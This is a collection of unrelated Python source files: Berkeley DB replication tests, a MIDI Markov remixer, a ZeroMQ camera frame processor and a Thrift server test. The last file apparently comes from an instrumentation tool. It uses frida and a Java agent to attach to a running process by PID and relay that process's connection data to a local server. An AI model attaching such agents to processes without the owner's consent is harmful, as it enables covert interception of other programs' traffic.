self.dbMaster = self.dbClient = None
def tearDown(self):
if self.dbClient :
self.dbClient.close()
if self.dbMaster :
self.dbMaster.close()
self.dbenvClient.close()
self.dbenvMaster.close()
test_support.rmtree(self.homeDirClient)
test_support.rmtree(self.homeDirMaster)
def test01_basic_replication(self) :
master_port = test_support.find_unused_port()
self.dbenvMaster.repmgr_set_local_site("127.0.0.1", master_port)
client_port = test_support.find_unused_port()
self.dbenvClient.repmgr_set_local_site("127.0.0.1", client_port)
self.dbenvMaster.repmgr_add_remote_site("127.0.0.1", client_port)
self.dbenvClient.repmgr_add_remote_site("127.0.0.1", master_port)
self.dbenvMaster.rep_set_nsites(2)
self.dbenvClient.rep_set_nsites(2)
self.dbenvMaster.rep_set_priority(10)
self.dbenvClient.rep_set_priority(0)
self.dbenvMaster.rep_set_timeout(db.DB_REP_CONNECTION_RETRY,100123)
self.dbenvClient.rep_set_timeout(db.DB_REP_CONNECTION_RETRY,100321)
self.assertEquals(self.dbenvMaster.rep_get_timeout(
db.DB_REP_CONNECTION_RETRY), 100123)
self.assertEquals(self.dbenvClient.rep_get_timeout(
db.DB_REP_CONNECTION_RETRY), 100321)
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 100234)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 100432)
self.assertEquals(self.dbenvMaster.rep_get_timeout(
db.DB_REP_ELECTION_TIMEOUT), 100234)
self.assertEquals(self.dbenvClient.rep_get_timeout(
db.DB_REP_ELECTION_TIMEOUT), 100432)
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_RETRY, 100345)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_RETRY, 100543)
self.assertEquals(self.dbenvMaster.rep_get_timeout(
db.DB_REP_ELECTION_RETRY), 100345)
self.assertEquals(self.dbenvClient.rep_get_timeout(
db.DB_REP_ELECTION_RETRY), 100543)
self.dbenvMaster.repmgr_set_ack_policy(db.DB_REPMGR_ACKS_ALL)
self.dbenvClient.repmgr_set_ack_policy(db.DB_REPMGR_ACKS_ALL)
self.dbenvMaster.repmgr_start(1, db.DB_REP_MASTER)
self.dbenvClient.repmgr_start(1, db.DB_REP_CLIENT)
self.assertEquals(self.dbenvMaster.rep_get_nsites(),2)
self.assertEquals(self.dbenvClient.rep_get_nsites(),2)
self.assertEquals(self.dbenvMaster.rep_get_priority(),10)
self.assertEquals(self.dbenvClient.rep_get_priority(),0)
self.assertEquals(self.dbenvMaster.repmgr_get_ack_policy(),
db.DB_REPMGR_ACKS_ALL)
self.assertEquals(self.dbenvClient.repmgr_get_ack_policy(),
db.DB_REPMGR_ACKS_ALL)
# The timeout is necessary in BDB 4.5, since DB_EVENT_REP_STARTUPDONE
# is not generated if the master has no new transactions.
# This is solved in BDB 4.6 (#15542).
import time
timeout = time.time()+10
while (time.time()<timeout) and not (self.confirmed_master and self.client_startupdone) :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
d = self.dbenvMaster.repmgr_site_list()
self.assertEquals(len(d), 1)
self.assertEquals(d[0][0], "127.0.0.1")
self.assertEquals(d[0][1], client_port)
self.assertTrue((d[0][2]==db.DB_REPMGR_CONNECTED) or \
(d[0][2]==db.DB_REPMGR_DISCONNECTED))
d = self.dbenvClient.repmgr_site_list()
self.assertEquals(len(d), 1)
self.assertEquals(d[0][0], "127.0.0.1")
self.assertEquals(d[0][1], master_port)
self.assertTrue((d[0][2]==db.DB_REPMGR_CONNECTED) or \
(d[0][2]==db.DB_REPMGR_DISCONNECTED))
if db.version() >= (4,6) :
d = self.dbenvMaster.repmgr_stat(flags=db.DB_STAT_CLEAR)
self.assertTrue("msgs_queued" in d)
self.dbMaster=db.DB(self.dbenvMaster)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.open("test", db.DB_HASH, db.DB_CREATE, 0666, txn=txn)
txn.commit()
import time,os.path
timeout=time.time()+10
while (time.time()<timeout) and \
not (os.path.exists(os.path.join(self.homeDirClient,"test"))) :
time.sleep(0.01)
self.dbClient=db.DB(self.dbenvClient)
while True :
txn=self.dbenvClient.txn_begin()
try :
self.dbClient.open("test", db.DB_HASH, flags=db.DB_RDONLY,
mode=0666, txn=txn)
except db.DBRepHandleDeadError :
txn.abort()
self.dbClient.close()
self.dbClient=db.DB(self.dbenvClient)
continue
txn.commit()
break
txn=self.dbenvMaster.txn_begin()
self.dbMaster.put("ABC", "123", txn=txn)
txn.commit()
import time
timeout=time.time()+10
v=None
while (time.time()<timeout) and (v==None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals("123", v)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.delete("ABC", txn=txn)
txn.commit()
timeout=time.time()+10
while (time.time()<timeout) and (v!=None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals(None, v)
class DBBaseReplication(DBReplicationManager):
def setUp(self) :
DBReplicationManager.setUp(self)
def confirmed_master(a,b,c) :
if (b == db.DB_EVENT_REP_MASTER) or (b == db.DB_EVENT_REP_ELECTED) :
self.confirmed_master = True
def client_startupdone(a,b,c) :
if b == db.DB_EVENT_REP_STARTUPDONE :
self.client_startupdone = True
self.dbenvMaster.set_event_notify(confirmed_master)
self.dbenvClient.set_event_notify(client_startupdone)
import Queue
self.m2c = Queue.Queue()
self.c2m = Queue.Queue()
# There are only two nodes, so we don't need to
# do any routing decision
def m2c(dbenv, control, rec, lsnp, envid, flags) :
self.m2c.put((control, rec))
def c2m(dbenv, control, rec, lsnp, envid, flags) :
self.c2m.put((control, rec))
self.dbenvMaster.rep_set_transport(13,m2c)
self.dbenvMaster.rep_set_priority(10)
self.dbenvClient.rep_set_transport(3,c2m)
self.dbenvClient.rep_set_priority(0)
self.assertEquals(self.dbenvMaster.rep_get_priority(),10)
self.assertEquals(self.dbenvClient.rep_get_priority(),0)
#self.dbenvMaster.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvMaster.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
#self.dbenvClient.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvClient.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
def thread_master() :
return self.thread_do(self.dbenvMaster, self.c2m, 3,
self.master_doing_election, True)
def thread_client() :
return self.thread_do(self.dbenvClient, self.m2c, 13,
self.client_doing_election, False)
from threading import Thread
t_m=Thread(target=thread_master)
t_c=Thread(target=thread_client)
import sys
if sys.version_info[0] < 3 :
t_m.setDaemon(True)
t_c.setDaemon(True)
else :
t_m.daemon = True
t_c.daemon = True
self.t_m = t_m
self.t_c = t_c
self.dbMaster = self.dbClient = None
self.master_doing_election=[False]
self.client_doing_election=[False]
def tearDown(self):
if self.dbClient :
self.dbClient.close()
if self.dbMaster :
self.dbMaster.close()
self.m2c.put(None)
self.c2m.put(None)
self.t_m.join()
self.t_c.join()
self.dbenvClient.close()
self.dbenvMaster.close()
test_support.rmtree(self.homeDirClient)
test_support.rmtree(self.homeDirMaster)
def basic_rep_threading(self) :
self.dbenvMaster.rep_start(flags=db.DB_REP_MASTER)
self.dbenvClient.rep_start(flags=db.DB_REP_CLIENT)
def thread_do(env, q, envid, election_status, must_be_master) :
while True :
v=q.get()
if v == None : return
env.rep_process_message(v[0], v[1], envid)
self.thread_do = thread_do
self.t_m.start()
self.t_c.start()
def test01_basic_replication(self) :
self.basic_rep_threading()
# The timeout is necessary in BDB 4.5, since DB_EVENT_REP_STARTUPDONE
# is not generated if the master has no new transactions.
# This is solved in BDB 4.6 (#15542).
import time
timeout = time.time()+10
while (time.time()<timeout) and not (self.confirmed_master and
self.client_startupdone) :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.dbMaster=db.DB(self.dbenvMaster)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.open("test", db.DB_HASH, db.DB_CREATE, 0666, txn=txn)
txn.commit()
import time,os.path
timeout=time.time()+10
while (time.time()<timeout) and \
not (os.path.exists(os.path.join(self.homeDirClient,"test"))) :
time.sleep(0.01)
self.dbClient=db.DB(self.dbenvClient)
while True :
txn=self.dbenvClient.txn_begin()
try :
self.dbClient.open("test", db.DB_HASH, flags=db.DB_RDONLY,
mode=0666, txn=txn)
except db.DBRepHandleDeadError :
txn.abort()
self.dbClient.close()
self.dbClient=db.DB(self.dbenvClient)
continue
txn.commit()
break
d = self.dbenvMaster.rep_stat(flags=db.DB_STAT_CLEAR)
self.assertTrue("master_changes" in d)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.put("ABC", "123", txn=txn)
txn.commit()
import time
timeout=time.time()+10
v=None
while (time.time()<timeout) and (v==None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals("123", v)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.delete("ABC", txn=txn)
txn.commit()
timeout=time.time()+10
while (time.time()<timeout) and (v!=None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals(None, v)
if db.version() >= (4,7) :
def test02_test_request(self) :
self.basic_rep_threading()
(minimum, maximum) = self.dbenvClient.rep_get_request()
self.dbenvClient.rep_set_request(minimum-1, maximum+1)
self.assertEqual(self.dbenvClient.rep_get_request(),
(minimum-1, maximum+1))
if db.version() >= (4,6) :
def test03_master_election(self) :
# Get ready to hold an election
#self.dbenvMaster.rep_start(flags=db.DB_REP_MASTER)
self.dbenvMaster.rep_start(flags=db.DB_REP_CLIENT)
self.dbenvClient.rep_start(flags=db.DB_REP_CLIENT)
def thread_do(env, q, envid, election_status, must_be_master) :
while True :
v=q.get()
if v == None : return
r = env.rep_process_message(v[0],v[1],envid)
if must_be_master and self.confirmed_master :
self.dbenvMaster.rep_start(flags = db.DB_REP_MASTER)
must_be_master = False
if r[0] == db.DB_REP_HOLDELECTION :
def elect() :
while True :
try :
env.rep_elect(2, 1)
election_status[0] = False
break
except db.DBRepUnavailError :
pass
if not election_status[0] and not self.confirmed_master :
from threading import Thread
election_status[0] = True
t=Thread(target=elect)
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
self.thread_do = thread_do
self.t_m.start()
self.t_c.start()
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 50000)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 50000)
self.client_doing_election[0] = True
while True :
try :
self.dbenvClient.rep_elect(2, 1)
self.client_doing_election[0] = False
break
except db.DBRepUnavailError :
pass
self.assertTrue(self.confirmed_master)
if db.version() >= (4,7) :
def test04_test_clockskew(self) :
fast, slow = 1234, 1230
self.dbenvMaster.rep_set_clockskew(fast, slow)
self.assertEqual((fast, slow),
self.dbenvMaster.rep_get_clockskew())
self.basic_rep_threading()
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
if db.version() >= (4, 6) :
dbenv = db.DBEnv()
try :
dbenv.repmgr_get_ack_policy()
ReplicationManager_available=True
except :
ReplicationManager_available=False
dbenv.close()
del dbenv
if ReplicationManager_available :
suite.addTest(unittest.makeSuite(DBReplicationManager))
if have_threads :
suite.addTest(unittest.makeSuite(DBBaseReplication))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
midointerface.py
|
"""
==========================================
Title: PyPlayer MidiInterface
Author: @jaquielajoie
Date: 9 July 2021
License: Apache 2.0
==========================================
"""
import os
import mido
import base64
import math
import time
import logging
import threading
from mido import MidiFile
from pyplayer.markov import MarkovPlayer
from pyplayer.keycache import KeyCache
from pyplayer.sleepmanager import SleepManager
from mido import bpm2tempo
from mido.frozen import freeze_message
def config_backend(port_string='IAC Driver Bus 1'):
mido.set_backend('mido.backends.rtmidi')
port = mido.open_output(port_string)
return port
def config_hyperparams():
pass
def get_tracks(filepath):
midi = MidiFile(filepath)
return midi.tracks
def decompose_messages(frozen_messages):
notes = []
triggers = []
durations = []
for msg in frozen_messages:
notes.append(msg.note)
triggers.append(msg.type)
durations.append(msg.time)
return {"notes": notes, "triggers": triggers, "durations": durations}
def log(name, track, interface):
logging.info("Thread %s: starting", name)
for msg in track:
time.sleep(int((msg.time + name) / 240))# / 480)) #480 is the default ticks per 8th note
if msg.type != 'unknown_meta':
print(msg)
if not msg.is_meta:
interface.port.play_note(msg)
elif hasattr(msg, 'data'):
print('\nUnknown meta message type: ' + str(msg.type_byte) + '\nmsg data: ' + str(msg.data))
else:
print('\nUnknown meta message type: ' + str(msg.type_byte) + '\nNo data associated with unknown meta message')
logging.info("Thread %s: finishing", name)
"""
Parent: ThreadManager
Child: MidiInterface
Parent: MidiInterface (processes 1 track)
Children: [MarkovPlayer, KeyCache, SleepManager]
"""
class MidiInterface():
def __init__(self):
self.port = config_backend()
self.tracks = None
self.polyphony = 2
self.bpm = 120
self.bpm_scale = 4
self.semitones = 0
self.vel = 0
self.channel_number = 0
self.nlen = 1
self.playable = False
self.keycache = None
self.mp = None
self.sleepmanager = None
def make_playable(self, playing):
# marks interface playing status
self.playable = playing
# stops playing
if not playing:
self.mp.stop()
def config_tracks(self, filepath=None):
if filepath is None:
filepath = input('Enter in the full midi file path: ').rstrip()
self.tracks = get_tracks(filepath)
def set_nlen(self, nlen):
self.nlen = nlen
def set_channel_number(self, channel_number):
self.channel_number = channel_number
def set_tempo(self, bpm):
self.bpm = bpm
def shift_pitch(self, semitones):
self.semitones = semitones
def shift_velocity(self, vel):
self.vel = vel
def freeze_messages(self, track):
frozen = []
for m in track:
if m.type in ['note_on', 'note_off']:
m.velocity = abs(m.velocity + self.vel) % 127 # add floor
m.note = abs(m.note + self.semitones) % 127 # maybe this should be handled better...
msg = freeze_message(m)
frozen.append(msg)
return frozen
def play_note(self, play, keycache):
msg = mido.Message(play["trigger"], note=play["note"], time=play["duration"])
if msg.is_meta: # Not possible as of 7-12-21
return
keycache.process(msg)
return msg
def play_tracks(self, nlen=None): # nlen not used, just for debugging convenience [will delete]
for i, track in enumerate(self.tracks):
print(f"Track {i}: {track.name}")
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt="%H:%M:%S")
logging.info('Creating new channel_midi (MidiInterface.play_tracks)')
channel_midi = threading.Thread(target=log, args=(i, track, self))  # log() expects the interface, not just the port
logging.info("play_tracks: before starting thread")
channel_midi.start()
logging.info("play_tracks: waiting for the thread to finish")
logging.info("play_tracks: finised thread")
def remix_track(self, iters, bus):
# channel_number = min( (len(self.tracks) - 1 ), self.channel_number )
self.port = config_backend(port_string=bus)
"""
Safety check -->
Many midi files have blank tracks that cannot generate markov models if used.
"""
midi_lists = []
for track in self.tracks:
midi_list = decompose_messages(self.freeze_messages(track))
midi_lists.append(midi_list)
largest_ml = {"notes": [], "triggers": [], "durations": []}
for ml in midi_lists:
if len(ml["notes"]) > len(largest_ml["notes"]): # notes, triggers, durations should be same len
largest_ml = ml
midi_list = largest_ml
"""
Set up & run
"""
self.mp = MarkovPlayer(nlen=self.nlen, midi_list=midi_list, interface=self)
self.keycache = KeyCache(port=self.port, polyphony=self.polyphony, channel_number=self.channel_number)
self.sleepmanager = SleepManager(bpm=self.bpm)
self.mp.run(iters, self.keycache, self.sleepmanager)
# turn all notes off
self.keycache.nuke()
if __name__ == "__main__":
midi_interface = MidiInterface()
midi_interface.config_tracks()
midi_interface.remix_track(nlen=4)
|
camera_process_video_task.py
|
'''
camera_process_video_task.py
ancilla
Created by Kevin Musselman (kevin@frenzylabs.com) on 01/21/20
Copyright 2019 FrenzyLabs, LLC.
'''
import threading
import time
import sys
import os
import zmq
from zmq.eventloop.zmqstream import ZMQStream
import zmq.utils.monitor
# import zmq.asyncio
import json
from tornado.ioloop import IOLoop
# from zmq.eventloop.ioloop import PeriodicCallback
from ..zhelpers import zpipe
from ...data.models import PrintSlice, CameraRecording
# from .devices import *
from asyncio import sleep
# from tornado.gen import sleep
from .ancilla_task import AncillaTask
from ...env import Env
from ..events.camera import Camera
import datetime
import pickle
import cv2
import numpy as np
import gc
class CameraProcessVideoTask(AncillaTask):
def __init__(self, name, service, payload, *args):
super().__init__(name, *args)
# self.request_id = request_id
self.current_frame = None
self.current_framenum = None
self.payload = payload
self.camera_model = self.payload.get("camera") or {}
self.camera_settings = self.camera_model.get("settings") or {}
self.video_settings = self.camera_settings.get("video") or {"size": [640, 480]}
width, height = self.video_settings.get("size") or [640, 480]
self.video_size = (width, height)
self.service = service
self.state.update({"name": name, "status": "pending", "model": {}})
self.processed_stream = f"ipc://{self.service.identity}_image_processor.ipc"
self.processing_thread = None
self.running = False
self.current_frame = None
image_collector = self.service.process.ctx.socket(zmq.SUB)
image_collector.setsockopt(zmq.RCVHWM, 10)
# image_collector.setsockopt(zmq.CONFLATE, 1)
# image_collector.setsockopt(zmq.RCVBUF, 2*1024)
image_collector.connect(self.service.process.pubsub_address)
self.image_collector = ZMQStream(image_collector)
self.image_collector.linger = 0
self.image_collector.on_recv(self.on_data, copy=True)
image_collector.setsockopt(zmq.SUBSCRIBE, b'data.camera.data_received')
image_collector.setsockopt(zmq.SUBSCRIBE, b'events.camera.connection.closed')
self.ready = True
def on_data(self, msg):
# identity, identifier, frm_num, frame = data
if len(msg) != 4:
# print(f"DATA = {msg[0]}", flush=True)
# if 'bytes' in msg[0]:
# if msg[0].bytes.endswith(b'connection.closed'):
# self.running = False
# self.state.status = "closed"
if msg[0].endswith(b'connection.closed'):
self.running = False
self.state.status = "closed"
return
else:
topic, identifier, framenum, imgdata = msg
fnum = int(framenum.decode('utf-8'))
# print(f"DATA = {topic}", flush=True)
self.current_framenum = fnum
self.current_frame = [topic, framenum, imgdata]
async def run(self, *args):
self.running = True
self.state.status = "running"
if not self.processing_thread or not self.processing_thread.is_alive():
self.processing_thread = threading.Thread(target=self.process_images, args=(self.service.process.ctx,))
self.processing_thread.daemon = True
# self.thread_read.name = 'camera->reader'
self.processing_thread.start()
while self.state.status == "running":
await sleep(1)
print("FINISHED PROCESSING", flush=True)
self.running = False
self.image_collector.close()
def process_images(self, ctx):
# print(f"RUN Camera Image Processor SERVER: {self.processed_stream}", flush=True)
self.publish_data = ctx.socket(zmq.XPUB)
# self.publish_data.setsockopt(zmq.SNDHWM, 100)
# self.publish_data.setsockopt(zmq.SNDBUF, 2*1024)
self.publish_data.bind(self.processed_stream)
# self._mon_socket = self.publish_data.get_monitor_socket(zmq.EVENT_CONNECTED | zmq.EVENT_DISCONNECTED)
# self._mon_stream = ZMQStream(self._mon_socket)
# self._mon_stream.on_recv(self._on_mon)
self.timer = time.time()
self.subscription_time = time.time()
poller = zmq.Poller()
# poller.register(image_collector, zmq.POLLIN)
poller.register(self.publish_data, zmq.POLLIN)
# poller.register(self._mon_socket, zmq.POLLIN)
self.subscribers = {}
framenum = 0
while self.running:
try:
if len(self.subscribers.keys()) == 0 and (time.time() - self.subscription_time) > 10:
self.state.status = "idle-close"
break
try:
items = dict(poller.poll(1))
except:
break  # Interrupted
if framenum != self.current_framenum and self.current_frame:
# if self.current_framenum - framenum > 1:
# print(f'Frame: l: {framenum}, cur: {self.current_framenum}')
self.process_img(self.current_frame)
framenum = self.current_framenum
if self.publish_data in items:
event = self.publish_data.recv()
if event[0] == 0:
topic = event[1:]
if topic in self.subscribers:
del self.subscribers[topic]
print(f"PUBLISH SOCKET has UNSubscribed {topic}")
self.subscription_time = time.time()
elif event[0] == 1:
topic = event[1:]
if len(topic) > 1:
self.subscribers[topic] = time.time()
print(f"PUBLISH SOCKET has subscribed {topic}")
except Exception as e:
print(f'Exception with Camera Process: {str(e)}', flush=True)
if self.publish_data:
self.publish_data.send_multipart([self.service.identity + b'.error', b'error', str(e).encode('ascii')], copy=True)
# device_collector.send_multipart([self.identity, b'error', str(e).encode('ascii')])
break
if self.publish_data and self.state.status == "closed":
try:
self.publish_data.send_multipart([self.service.identity + b'.connection.closed', b"Connection Closed"], copy=True)
except:
pass
self.publish_data.close()
self.publish_data = None
def process_img(self, data):
topic, framenum, msg = data
# fnum = int(framenum.decode('utf-8'))
if not self.ready:
return
self.ready = False
frame = pickle.loads(msg)
# frame = np.frombuffer(frame, dtype="int8")
# frame = np.fromstring(frame , np.uint8)
frame = cv2.flip(frame, 1)
# x = frame
x = cv2.resize(frame, dsize=self.video_size, interpolation=cv2.INTER_CUBIC)
# # print(x.shape)
# x = x.astype(np.uint8)
# encodedImage = x
(flag, encodedImage) = cv2.imencode(".jpg", x)
ebytes = encodedImage.tobytes()
try:
self.publish_data.send_multipart([self.service.identity + b'.data', framenum, ebytes], copy=False)
except Exception as e:
print(f'Publish CamPV Exception {str(e)}', flush=True)
# pass
self.ready = True
def _on_mon(self, msg):
print("MONITOR SOCKET", msg)
ev = zmq.utils.monitor.parse_monitor_message(msg)
event = ev['event']
endpoint = ev['endpoint']
if event == zmq.EVENT_CONNECTED:
print(f"CONNECTED {endpoint}")
pass
elif event == zmq.EVENT_DISCONNECTED:
print(f"DISCONNECTED {endpoint}")
pass
def stop(self, *args):
self.running = False
self.close()
def close(self, *args):
self.state.status = "closed"
def cancel(self):
self.state.status = "cancelled"
def finished(self):
self.state.status = "finished"
def pause(self):
self.flush_callback.stop()
def resume(self):
self.flush_callback.start()
# self.state.status = "paused"
def get_state(self):
self.service.fire_event(Camera.recording.state.changed, self.state)
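# Illustrative sketch (assumption, not part of the service): a minimal consumer for the
# frames this task republishes. It connects a SUB socket to the task's processed_stream
# address and reads one multipart message of the form [topic, framenum, jpeg_bytes],
# matching the send_multipart() call in process_img() above.
def _example_frame_subscriber(processed_stream_address, identity):
    ctx = zmq.Context.instance()
    sub = ctx.socket(zmq.SUB)
    sub.connect(processed_stream_address)
    sub.setsockopt(zmq.SUBSCRIBE, identity + b'.data')  # same topic prefix used by the publisher
    topic, framenum, jpeg_bytes = sub.recv_multipart()
    sub.close()
    return framenum, jpeg_bytes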
|
TestCppServer.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# this interferes with ServiceRouter/SWIG
# @lint-avoid-python-3-compatibility-imports
#from __future__ import unicode_literals
import multiprocessing
import sys
import threading
import time
from fb303.ContextFacebookBase import FacebookBase
from libfb.testutil import BaseFacebookTestCase
from thrift.transport import TSocket, TTransport
from thrift.protocol import TBinaryProtocol
from thrift.Thrift import TProcessorEventHandler
from thrift.server.TCppServer import TCppServer
from thrift.server.TServer import TServerEventHandler
from tools.test.stubs import fbpyunit
from test.sleep import SleepService, ttypes
TIMEOUT = 60 * 1000 # milliseconds
def getClient(addr):
transport = TSocket.TSocket(addr[0], addr[1])
transport = TTransport.TFramedTransport(transport)
protocol = TBinaryProtocol.TBinaryProtocol(transport)
client = SleepService.Client(protocol)
transport.open()
return client
class SleepProcessorEventHandler(TProcessorEventHandler):
def getHandlerContext(self, fn_name, server_context):
self.last_peer_name = server_context.getPeerName()
self.last_sock_name = server_context.getSockName()
class SleepHandler(FacebookBase, SleepService.Iface):
def __init__(self, noop_event):
FacebookBase.__init__(self, "sleep")
self.noop_event = noop_event
def sleep(self, seconds):
print("server sleeping...")
time.sleep(seconds)
print("server sleeping... done")
def space(self, s):
if isinstance(s, bytes):
s = s.decode('latin1')
return " ".join(s)
def noop(self):
self.noop_event.set()
class SpaceProcess(multiprocessing.Process):
def __init__(self, addr):
self.queue = multiprocessing.Queue()
multiprocessing.Process.__init__(
self, target=self.target, args=(self.queue,))
self.addr = addr
def target(self, queue):
client = getClient(self.addr)
hw = "hello, world"
hw_spaced = "h e l l o , w o r l d"
result = client.space(hw)
if isinstance(result, bytes):
result = result.decode('latin1')
assert result == hw_spaced
queue.put((client._iprot.trans.getTransport().getSocketName(),
client._iprot.trans.getTransport().getPeerName()))
class ParallelProcess(multiprocessing.Process):
def __init__(self, addr):
multiprocessing.Process.__init__(self)
self.addr = addr
def run(self):
clients = []
for i in range(0, 4):
clients.append(getClient(self.addr))
for c in clients:
c.send_sleep(3)
for c in clients:
c.recv_sleep()
class OnewayProcess(multiprocessing.Process):
def __init__(self, addr):
multiprocessing.Process.__init__(self)
self.addr = addr
def run(self):
client = getClient(self.addr)
client.noop()
class TestServerEventHandler(TServerEventHandler):
def __init__(self):
self.connCreated = 0
self.connDestroyed = 0
def newConnection(self, context):
self.connCreated += 1
def connectionDestroyed(self, context):
self.connDestroyed += 1
class TestServer(BaseFacebookTestCase):
def setUp(self):
super(TestServer, self).setUp()
self.noop_event = threading.Event()
processor = SleepService.Processor(SleepHandler(self.noop_event))
self.event_handler = SleepProcessorEventHandler()
processor.setEventHandler(self.event_handler)
self.serverEventHandler = TestServerEventHandler()
self.server = TCppServer(processor)
self.server.setServerEventHandler(self.serverEventHandler)
self.addCleanup(self.stopServer)
# Let the kernel choose a port.
self.server.setPort(0)
self.server_thread = threading.Thread(target=self.server.serve)
self.server_thread.start()
for _ in range(30):
addr = self.server.getAddress()
if addr:
break
time.sleep(0.1)
self.assertTrue(addr)
self.server_addr = addr
def stopServer(self):
if self.server:
self.server.stop()
self.server = None
def testSpace(self):
space = SpaceProcess(self.server_addr)
space.start()
client_sockname, client_peername = space.queue.get()
space.join()
self.stopServer()
self.assertEquals(space.exitcode, 0)
self.assertEquals(self.event_handler.last_peer_name, client_sockname)
self.assertEquals(self.event_handler.last_sock_name, client_peername)
self.assertEquals(self.serverEventHandler.connCreated, 1)
self.assertEquals(self.serverEventHandler.connDestroyed, 1)
def testParallel(self):
parallel = ParallelProcess(self.server_addr)
parallel.start()
start_time = time.time()
# this should take about 3 seconds. In practice on an unloaded
# box, it takes about 3.6 seconds.
parallel.join()
duration = time.time() - start_time
print("total time = {}".format(duration))
self.stopServer()
self.assertEqual(parallel.exitcode, 0)
self.assertLess(duration, 5)
def testOneway(self):
oneway = OnewayProcess(self.server_addr)
oneway.start()
oneway.join()
self.stopServer()
self.assertTrue(self.noop_event.wait(5))
if __name__ == '__main__':
rc = fbpyunit.MainProgram(sys.argv).run()
sys.exit(rc)
|
java.py
|
import logging
import os.path
import socketserver
import struct
import subprocess
import sys
import threading
from hmac import compare_digest
from secrets import token_urlsafe
import frida
from hallucinate.handler import RequestHandler
from hallucinate.handlers.logging import LoggingHandler
class JavaAgentHandler(socketserver.BaseRequestHandler):
def read_bytes(self, n):
r = b''
while len(r) < n:
r += self.request.recv(n - len(r))
return r
def read_string(self):
length, = struct.unpack(">H", self.read_bytes(2))
return self.read_bytes(length).decode('utf-8')  # read_bytes handles short reads
def read_entry(self):
return self.read_string(), self.read_string()
def handle(self):
key = self.read_string()
if not compare_digest(key, self.server.key):
logging.warning("Client provided wrong key")
self.request.close()
return
while True:
r = self.read_bytes(4)
nentries, = struct.unpack('>I', r)
rdata = dict()
for i in range(nentries):
k, v = self.read_entry()
rdata[k] = v
# emulate conn entry, no nested array support
rdata['conn'] = {
'l': {'ip': rdata['localAddr'], 'port': int(rdata['localPort'])},
'r': {'ip': rdata['remoteAddr'], 'port': int(rdata['remotePort'])}
}
logging.debug('Received request from Java agent: %s', rdata)
def rhandle(data):
logging.debug('Sending response to Java agent: %s', data)
p = struct.pack('>I', len(data))
for k, v in data.items():
ke = str(k).encode('utf-8')
ve = str(v).encode('utf-8')
p += struct.pack('>H', len(ke)) + ke
p += struct.pack('>H', len(ve)) + ve
self.request.sendall(p)
self.server.handler(rdata, rhandle)
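# Illustrative sketch (not part of the agent protocol code): shows how a client-side
# agent would frame the data that JavaAgentHandler.handle() reads. Strings use a 2-byte
# big-endian length prefix followed by UTF-8 bytes; the key is sent once per connection,
# and each request is a 4-byte big-endian entry count followed by key/value string pairs.
def _sketch_encode_agent_request(key, entries):
    def enc(s):
        b = str(s).encode('utf-8')
        return struct.pack('>H', len(b)) + b
    framed = enc(key)                          # authentication key (sent once per connection)
    framed += struct.pack('>I', len(entries))  # number of entries in this request
    for k, v in entries.items():
        framed += enc(k) + enc(v)
    return framed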
class JavaAgentServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
allow_reuse_address = True
block_on_close = False
def __init__(self, host, port, handler, key):
super(JavaAgentServer, self).__init__((host, port), JavaAgentHandler)
self.handler = handler
self.key = key
def test_handler(r, rhandle):
rhandle({'decision': 'ignore'})
def start_server(handler, host='localhost', port=0, key=None):
if key is None:
key = token_urlsafe(32)
server = JavaAgentServer(host, port, lambda d, r: handler.handle_payload(d, r), key)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
if port == 0:
port = server.socket.getsockname()[1]
return server, key, host, port
def stop_server(s):
s.server_close()
def java_attach(pid, agentcfg, java='java', agentjar=None):
if agentjar is None:
agentjar = os.path.dirname(os.path.realpath(__file__)) + os.sep + 'hallucinate-java-all.jar'
subprocess.run([
java, '-cp',
agentjar,
'gs.sy.m8.hallucinate.Launcher', str(pid), agentcfg
], stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
_javaserver = None
_agentcfg = None
def java_attach_runtime(pid, h, args):
global _javaserver, _agentcfg
if _javaserver is not None:
logging.warning("Java server can only be initialized once")
return
logging.info('Java process detected, starting server')
s, key, host, port = start_server(h, host=args.javaagenthost, port=args.javaagentport, key=args.javaagentkey)
debug = ''
if args.verbose > 1:
debug = 'debug;'
_agentcfg = '%sserverport=%d;serveraddr=%s;serverkey=%s' % (debug, port, host, key)
# need to resume, otherwise attach fails
try:
frida.resume(pid)
except frida.InvalidArgumentError as e:
logging.debug('Failed to resume process', exc_info=e)
pass
_javaserver = s
